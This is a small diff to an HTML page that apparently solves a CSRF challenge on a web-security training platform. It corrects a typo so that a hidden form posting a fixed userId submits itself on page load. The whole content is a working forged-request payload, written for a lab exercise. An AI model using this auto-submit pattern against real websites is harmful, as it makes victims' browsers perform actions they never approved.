--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 <!DOCTYPE html>
 <body>
 <form action="https://shepherd.websec.dedyn.io/user/csrfchallengetwo/plusplus" method="POST" name="csrf">
-<imput type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
+<input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
 </form>
 <script>document.csrf.submit()</script>
 </body>
-
 </html>
+
